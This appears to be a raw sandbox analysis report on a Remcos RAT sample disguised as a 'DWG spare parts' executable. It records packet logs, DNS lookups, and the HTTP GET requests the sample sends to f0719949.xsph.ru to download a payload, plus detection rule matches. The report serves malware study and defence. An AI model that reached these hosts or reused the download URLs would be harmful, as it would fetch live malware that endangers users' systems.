                                                              Sep 16, 2022 17:08:58.605362892 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605381966 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605403900 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605428934 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605442047 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605472088 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605482101 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605509043 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605523109 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605547905 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605561018 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605593920 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605601072 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605617046 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605639935 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605675936 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605679989 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605693102 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605720997 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605746984 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605758905 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605791092 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605798006 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605817080 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605838060 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605861902 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605875969 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605905056 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605916023 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605942965 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605958939 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.605979919 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.605998993 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606024981 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606040001 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606061935 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606080055 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606108904 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606122017 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606147051 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606161118 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606188059 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606199026 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606221914 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606237888 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606264114 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606276989 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606306076 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606317043 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606338024 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606358051 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606384993 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606395960 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606426001 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606436968 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606462002 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606476068 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606503963 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606513977 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606544018 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606553078 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606575966 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606594086 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606618881 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606632948 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606659889 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606673956 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606704950 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606712103 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606738091 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606751919 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606779099 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606792927 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606817007 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606829882 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606858969 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606869936 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606894016 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606909037 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606935978 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606949091 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.606975079 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.606993914 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607017040 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607032061 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607062101 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607072115 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607108116 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607111931 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607132912 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607150078 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607178926 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607191086 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607212067 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607229948 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607255936 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607270002 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607299089 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607311010 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607335091 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607372046 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607374907 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607422113 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607440948 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607462883 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607485056 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607501030 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607527971 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607542038 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607569933 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607582092 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607611895 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607636929 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607671976 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607676029 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607692957 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607717991 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607749939 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607754946 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607784033 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607795000 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607825994 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607832909 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607875109 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.607877970 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607952118 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.607973099 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608011961 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608036041 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608048916 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608062029 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608088970 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608093023 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608128071 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608129025 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608155012 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608167887 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608201981 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608210087 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608234882 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608247042 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608285904 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608287096 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608310938 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608325005 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608359098 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608364105 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.608402014 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.608403921 CEST8049732141.8.192.151192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 16, 2022 17:08:30.572138071 CEST | 61178 | 53 | 192.168.2.7 | 8.8.8.8
Sep 16, 2022 17:08:30.594722033 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.7
Sep 16, 2022 17:08:34.632035017 CEST | 53336 | 53 | 192.168.2.7 | 8.8.8.8
Sep 16, 2022 17:08:34.653458118 CEST | 53 | 53336 | 8.8.8.8 | 192.168.2.7
Sep 16, 2022 17:08:35.654151917 CEST | 51007 | 53 | 192.168.2.7 | 8.8.8.8
Sep 16, 2022 17:08:35.672265053 CEST | 53 | 51007 | 8.8.8.8 | 192.168.2.7
Sep 16, 2022 17:08:49.704793930 CEST | 50513 | 53 | 192.168.2.7 | 8.8.8.8
Sep 16, 2022 17:08:49.724684954 CEST | 53 | 50513 | 8.8.8.8 | 192.168.2.7
Sep 16, 2022 17:08:58.028836966 CEST | 58283 | 53 | 192.168.2.7 | 8.8.8.8
Sep 16, 2022 17:08:58.050692081 CEST | 53 | 58283 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 16, 2022 17:08:30.572138071 CEST | 192.168.2.7 | 8.8.8.8 | 0x99cf | Standard query (0) | f0719949.xsph.ru | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:34.632035017 CEST | 192.168.2.7 | 8.8.8.8 | 0x97ca | Standard query (0) | bestsuccess.ddns.net | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:35.654151917 CEST | 192.168.2.7 | 8.8.8.8 | 0x2d01 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:49.704793930 CEST | 192.168.2.7 | 8.8.8.8 | 0x5f2a | Standard query (0) | f0719949.xsph.ru | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:58.028836966 CEST | 192.168.2.7 | 8.8.8.8 | 0xc85e | Standard query (0) | f0719949.xsph.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 16, 2022 17:08:30.594722033 CEST | 8.8.8.8 | 192.168.2.7 | 0x99cf | No error (0) | f0719949.xsph.ru | | 141.8.192.151 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:34.653458118 CEST | 8.8.8.8 | 192.168.2.7 | 0x97ca | No error (0) | bestsuccess.ddns.net | | 79.134.225.115 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:35.672265053 CEST | 8.8.8.8 | 192.168.2.7 | 0x2d01 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:49.724684954 CEST | 8.8.8.8 | 192.168.2.7 | 0x5f2a | No error (0) | f0719949.xsph.ru | | 141.8.192.151 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 17:08:58.050692081 CEST | 8.8.8.8 | 192.168.2.7 | 0xc85e | No error (0) | f0719949.xsph.ru | | 141.8.192.151 | A (IP address) | IN (0x0001) | false
                                                              • f0719949.xsph.ru
                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49721 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
Timestamp | kBytes transferred | Direction | Data
Sep 16, 2022 17:08:30.690772057 CEST | 93 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
User-Agent: lVali
Host: f0719949.xsph.ru
Sep 16, 2022 17:08:30.752866983 CEST | 95 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:30 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              1 | 192.168.2.7 | 49722 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:30.824110985 CEST | 136 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 53
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:30.886725903 CEST | 137 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:30 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              2 | 192.168.2.7 | 49726 | 178.237.33.50 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:35.720278978 CEST | 653 | OUT | GET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              Sep 16, 2022 17:08:35.751432896 CEST | 654 | IN | HTTP/1.1 200 OK
                                                              date: Fri, 16 Sep 2022 15:08:35 GMT
                                                              server: Apache
                                                              expires: Fri, 16 Sep 2022 15:08:35 GMT
                                                              content-length: 945
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Ascii: { "geoplugin_request":"84.17.52.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Zurich", "geoplugin_region":"Zurich", "geoplugin_regionCode":"ZH", "geoplugin_regionName":"Zurich", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.43", "geoplugin_longitude":"8.5718", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9635}


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              3 | 192.168.2.7 | 49727 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:49.810384035 CEST | 656 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: lVali
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:49.877140045 CEST | 657 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:49 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Sep 16, 2022 17:08:49.942672014 CEST671INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              4 | 192.168.2.7 | 49728 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:49.980505943 CEST | 698 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 62
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:50.049272060 CEST | 699 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:49 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              5 | 192.168.2.7 | 49731 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:58.134170055 CEST | 1225 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: lVali
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:58.198698044 CEST | 1226 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:58 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              6 | 192.168.2.7 | 49732 | 141.8.192.151 | 80 | C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 16, 2022 17:08:58.269932032 CEST | 1268 | OUT | GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 17
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:58.338527918 CEST | 1269 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:58 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:58.338687897 CEST1281INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:58.403788090 CEST1283INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3



                                                              Target ID:0
                                                              Start time:17:08:27
                                                              Start date:16/09/2022
                                                              Path:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              Target ID:1
                                                              Start time:17:08:32
                                                              Start date:16/09/2022
                                                              Path:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              Target ID:2
                                                              Start time:17:08:43
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Uuddcmhn.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
